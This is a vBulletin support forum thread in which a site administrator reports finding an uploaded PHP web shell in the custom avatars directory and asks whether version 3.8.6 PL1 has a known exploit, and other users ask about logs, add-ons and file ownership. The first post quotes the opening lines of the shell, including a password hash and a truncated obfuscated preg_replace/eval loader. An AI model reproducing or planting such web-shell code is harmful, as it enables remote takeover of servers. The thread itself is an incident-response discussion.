Announcement

Collapse
No announcement yet.

New 3.8.6 Patch Level 1 exploit ?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • New 3.8.6 Patch Level 1 exploit ?

    Gentlemen, is there a new know exploit for 3.8.6 Patch Level 1 ??

    In our customavatars directory two days ago a PHP file was uploaded, under filename avatar234258.php

    After further inspection it seems this is a filemanager:

    # Web Shell by oRb
    $auth_pass = "63a9f0ea7bb98050796b649e85481845";
    $color = "#df5";
    $default_action = 'FilesMan';
    $default_use_ajax = true;
    $default_charset = 'Windows-1251';
    preg_replace("/.*/e","\x65\x76\x61\x6

    This script when one loads it up works, it requests a password.

    We run a clean installation of 3.8.6 Patch Level 1 and have not upgraded to 3.8.7 as it contains no security fixes.

    The server is FreeBSD 8.2 and does not seem compomized + is up-to date. VBB does not shown any suspect files on any of its files.

    We do not run any plug-ins. ALL our dirs are 755, all our files are 644. We have renamed and protected directories for modcp and admincp. So this all does not make any sense ?

    There virtually would be no other way then the hacker uploading the file through the avatar pics upload sequence somehow ?

    Any clues / ideas ?

    We reuploaded all original files anyway to be sure and now have disabled custom avatars and profile pictures as we suspect there might be an exploit in the code ?.

  • #2
    How did you know/notice it was uploaded?

    Comment


    • #3
      There are no known exploits, nor do I know of anythin in vBulletin that would allow someone to upload a .php file. All files that get uploaded get transformed into something.attach
      There is not one other peice of websoftware on your ENTIRE server?

      http://stackoverflow.com/questions/3...ant-regex-work

      Comment


      • #4
        Hey Zach, no Sir -- it's a fairly new server, installed clean in February, it has the VBB 3.8.6 install and that's it ...

        @ Bird of Prey - We check file changes on a regular basis.

        Comment


        • #5
          You have not 1 other peice of software on the entire server that is capable of being exploited aside from vBulletin?

          Comment


          • #6
            No Sir, this server is 100% dedicated to VBB, nothing else.

            Comment


            • #7
              So you've verified that php, webserver, mysql, dns server, ftp server, third party vbulletin addons, your ad network/software, and all other software on the server is 101% secure and could not possibly have been the exploit point? Do you have any logs or proof showing that vBulltein is the point of entry?

              Comment


              • #8
                Hi Zach,

                I do not have the access-logs to back that up, we have a high volume traffic website and the logs will kill the server. The one thing I can say is that everything is up-to date including ftp, webserver (nginx php-cgi), only VBB is runnign from it. Ad software runs externally, MySQL is on another server .. really this only is a http frontend for vBulletin.

                Noting weird in the last logs/transfer logs etc.

                However before the finger pointing begins, again this is a clean fairly new server running only VBB. Anything I can do to find the cause please let me know.

                Comment


                • #9
                  I wish I had more information to give you, I'm not aware of any exploits in the wild that would allow an attacker to upload a php file from vBulletin. If we were aware of such an exploit we would be patching it ASAP and not letting our customers sit around with a massive issue. I also think we would see more wide spread exploitation of the issue honestly if it was easy. Without logs to try and track the attacker you might not beable to track down how it was injected into the site

                  Comment


                  • #10
                    According to the OS, who was the owner of the file ?
                    Baby, I was born this way

                    Comment


                    • #11
                      Do you have VBSEO installed?
                      anders | vbulletin team | check out the new vbulletin facebook app
                      Proudly vBulletin'ing since 2001
                      Please be my friend!
                      http://www.twitter.com/inetskunkworks
                      vBulletin Performance Articles:
                      Click here to read

                      Comment


                      • #12
                        Their urls are not currently being converted, not sure if there using it otherwise.

                        Comment


                        • #13
                          Hey guys, just got back. To answer some of the questions:

                          The owner of the file was www:www and no we do not have VBSEO installed, this is a pure 100% VBB 3.8.6 PL1 installation without any add-ons.

                          Let me throw in some additional info to see if any alarm bells ring at your end:

                          Server API CGI/FastCGI
                          PHP Version 5.2.17
                          Suhosin Patch 0.9.7
                          XCache v1.3.1
                          nginx/0.8.54

                          Comment

                          Related Topics

                          Collapse

                          Working...
                          X